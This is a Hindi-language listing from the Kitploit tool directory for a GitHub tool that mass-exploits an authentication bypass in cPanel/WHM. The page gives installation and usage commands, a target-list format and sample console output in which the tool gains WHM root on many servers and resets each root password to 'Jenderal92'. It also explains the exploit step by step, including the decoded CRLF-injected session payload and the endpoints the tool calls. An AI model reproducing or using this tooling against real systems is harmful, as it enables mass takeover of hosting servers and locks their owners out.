Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41940 — cPanel/WHM पर CVE-2026-41940 के लिए बल्क स्कैनर और सामूहिक शोषण उपकरण, स्वचालित लक्ष्य सत्यापन और उच्च-गति मल्टी-थ्रेडेड निष्पादन के लिए निर्मित। | Kitploit
उपकरण/GitHubGitHub/jenderal92/cve-2026-41940
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरणरेड टीमिंगपेलोड डेवलपमेंट
GitHubjenderal92/cve-2026-41940

CVE-2026-41940

cPanel/WHM पर CVE-2026-41940 के लिए बल्क स्कैनर और सामूहिक शोषण उपकरण, स्वचालित लक्ष्य सत्यापन और उच्च-गति मल्टी-थ्रेडेड निष्पादन के लिए निर्मित।

44264 महीने पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41940 - WHM/cPanel प्रमाणीकरण बायपास मास एक्सप्लॉइट

43153

📋 विवरण

CVE-2026-41940 WHM/cPanel में एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो हमलावरों को वैध क्रेडेंशियल के बिना प्रमाणीकरण को बायपास करने और सर्वर पर रूट एक्सेस प्राप्त करने की अनुमति देती है। यह भेद्यता सत्र प्रबंधन तंत्र में CRLF इंजेक्शन का लाभ उठाकर दुर्भावनापूर्ण सत्र पैरामीटर इंजेक्ट करती है।

यह टूल एक साथ कई लक्ष्यों के परीक्षण के लिए मल्टी-थ्रेडिंग समर्थन के साथ मास एक्सप्लॉइटेशन क्षमताएँ प्रदान करता है, जिसमें बुद्धिमान सफलता पहचान और अमान्य लक्ष्यों की स्वचालित फ़िल्टरिंग शामिल है।


🎯 मुख्य विशेषताएँ

विशेषताविवरण
✅ मास एक्सप्लॉइटेशनसूची फ़ाइल से कई लक्ष्यों को स्कैन और एक्सप्लॉइट करें
🚀 मल्टी-थ्रेडिंगतेज़ स्कैनिंग के लिए कॉन्फ़िगर करने योग्य थ्रेड संख्या (डिफ़ॉल्ट: 15)
🔐 स्वचालित पासवर्ड परिवर्तनसफल एक्सप्लॉइट पर रूट पासवर्ड को Jenderal92 में बदलता है
🛡️ स्मार्ट सफलता पहचानविभिन्न WHM API प्रतिक्रिया प्रारूपों का स्वचालित रूप से पता लगाता है
⚠️ लाइसेंस त्रुटि फ़िल्टरिंगअमान्य/लाइसेंस नहीं पढ़ सकता त्रुटियों वाले लक्ष्यों को बाहर करता है
📝 संरचित आउटपुटकेवल पुष्टि किए गए सफल परिणामों को `domain:port
🛡️ SSL/TLS समर्थनस्व-हस्ताक्षरित प्रमाणपत्रों को स्वचालित रूप से संभालता है
🔄 सत्र प्रबंधनस्वचालित सत्र निष्कर्षण, कुकी इंजेक्शन और टोकन हैंडलिंग
⏱️ टाइमआउट नियंत्रणकॉन्फ़िगर करने योग्य कनेक्शन टाइमआउट (डिफ़ॉल्ट: 15 सेकंड)
🔍 पूर्व-कनेक्शन जाँचएक्सप्लॉइटेशन प्रयास से पहले पोर्ट उपलब्धता सत्यापित करता है
📊 रीयल-टाइम प्रगतिप्रत्येक एक्सप्लॉइटेशन चरण के लिए विस्तृत प्रगति दिखाता है

📦 आवश्यकताएँ

  • Python 2.7 (आवश्यक - Python 3.x के साथ संगत नहीं)
  • लक्ष्य एक्सेस के लिए इंटरनेट कनेक्शन
  • आवश्यक Python पैकेज:
pip install requests urllib3 futures

या requirements.txt का उपयोग करें:

requests==2.27.1
urllib3==1.26.18
futures==3.4.0

📥 इंस्टॉलेशन

# Clone repository
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940

# Install dependencies
pip install -r requirements.txt

# Make executable (Linux/Mac)
chmod +x CVE-2026-41940.py

🚀 उपयोग

1. लक्ष्य फ़ाइल तैयार करें

targets.txt फ़ाइल बनाएँ जिसमें प्रत्येक पंक्ति में एक लक्ष्य हो:

https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com

नोट: पोर्ट 2087 डिफ़ॉल्ट WHM पोर्ट है। यदि निर्दिष्ट नहीं है, तो यह स्वचालित रूप से पोर्ट 2087 का उपयोग करेगा। यदि HTTP/HTTPS उपसर्ग गायब है तो इसे स्वचालित रूप से जोड़ा जाएगा।

2. एक्सप्लॉइट चलाएँ

मूल उपयोग (डिफ़ॉल्ट सेटिंग्स)

python2 CVE-2026-41940.py targets.txt

मल्टी-थ्रेडेड उपयोग

# Use 5 concurrent threads
python2 CVE-2026-41940.py targets.txt --threads 5

# Use 20 threads for faster scanning
python2 CVE-2026-41940.py targets.txt --threads 20

कस्टम होस्टनाम

# Override Host header for all targets
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10

कस्टम टाइमआउट

# Set timeout to 30 seconds for slow connections
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30

📊 कमांड लाइन तर्क

तर्कविवरणडिफ़ॉल्टआवश्यक
list_fileलक्ष्य सूची वाली फ़ाइल (प्रति पंक्ति एक)-✅ हाँ
--threadsसमवर्ती थ्रेड की संख्या15❌ नहीं
--hostnameसभी लक्ष्यों के लिए Host हेडर ओवरराइड करेंस्वतः पता लगाना❌ नहीं
--timeoutसेकंड में कनेक्शन टाइमआउट15❌ नहीं

📁 आउटपुट प्रारूप

परिणाम फ़ाइल (res.txt)

केवल पुष्टि किए गए सफल एक्सप्लॉइट सहेजे जाते हैं। लाइसेंस त्रुटियों, असफल पासवर्ड परिवर्तन या कनेक्शन समस्याओं वाले लक्ष्य स्वचालित रूप से बाहर कर दिए जाते हैं।

प्रारूप:

domain:port|root|Jenderal92

उदाहरण आउटपुट:

www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92

बाहर किए गए परिदृश्य

निम्नलिखित लक्ष्य res.txt में नहीं सहेजे जाएँगे:

  • लाइसेंस त्रुटियाँ (Cannot Read License File)
  • असफल पासवर्ड परिवर्तन
  • कनेक्शन टाइमआउट या अस्वीकृति
  • पैच किए गए/बिना WHM वाले लक्ष्य
  • गलत क्रेडेंशियल या सत्र विफलताएँ

कंसोल आउटपुट

$ python2 CVE-2026-41940.py targets.txt --threads 10

 CVE-2026-41940 bypass authentication - Mass Exploit

[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED

==================================================

[*] Checking target: 127.0.0.1
    Original input: 127.0.0.1
    Normalized: https://127.0.0.1:2087
    Port 2087: OPEN
    Testing connection... OK (HTTP 200)

[0] hostname = example.com
[1] minting a preauth session...
    session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
    HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.118.0.13"}
[*] attempting to change the root password
    passwd -> HTTP 200
    {
      "data": {
        "app": ["system"]
      },
      "metadata": {
        "output": {
          "raw": "Password for \"root\" has been changed."
        },
        "reason": "Password changed for user \"root\".",
        "version": 1,
        "command": "passwd",
        "result": 1
      }
    }
[+] Password change confirmed (metadata.result=1)
[+] ✓ Root password successfully changed to 'Jenderal92'!

[✓] SUCCESS & SAVED: 127.0.0.1:2087
    Saved to res.txt: 127.0.0.1:2087|root|Jenderal92

==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4

[+] Results saved to res.txt

Successfully exploited targets (password changed to Jenderal92):
  ✓ 127.0.0.1:2087

🔬 एक्सप्लॉइट कैसे काम करता है

एक्सप्लॉइट में बुद्धिमान सत्यापन के साथ 4 मुख्य चरण शामिल हैं:

चरण 1: पूर्व-प्रमाणीकरण सत्र

[1] minting a preauth session...
  • अमान्य क्रेडेंशियल के साथ /login/?login_only=1 पर POST अनुरोध भेजता है
  • सर्वर प्रतिक्रिया से whostmgrsession कुकी प्राप्त करता है
  • अंतिम ,<obhex> भाग को हटाकर सत्र आधार निकालता है
  • यह हमें काम करने के लिए एक मान्य सत्र प्रारूप देता है

चरण 2: CRLF इंजेक्शन हमला

[2] sending the CRLF injection...
  • दुर्भावनापूर्ण पेलोड वाले Authorization: Basic हेडर के साथ GET अनुरोध भेजता है
  • Base64 पेलोड निम्न में डिकोड होता है:
    root:x
    successful_internal_auth_with_timestamp=9999999999
    user=root
    tfa_verified=1
    hasroot=1
    
  • CRLF (\r\n) वर्ण नकली सत्र पैरामीटर इंजेक्ट करते हैं
  • यह सर्वर को यह सोचने के लिए धोखा देता है कि प्रमाणीकरण सफल था
  • सर्वर HTTP 307 और cp_security_token युक्त Location हेडर के साथ प्रतिक्रिया करता है

चरण 3: सत्र प्रसार

[3] firing do_token_denied to propagate...
  • हेरफेर की गई कुकी के साथ /scripts2/listaccts एंडपॉइंट तक पहुंचता है
  • WHM में do_token_denied तंत्र को ट्रिगर करता है
  • यह इंजेक्ट किए गए सत्र पैरामीटर को सर्वर के सत्र कैश में प्रसारित करता है
  • "Token denied" के साथ HTTP 401 प्रतिक्रिया सफल प्रसार की पुष्टि करती है
टूल डाउनलोड करें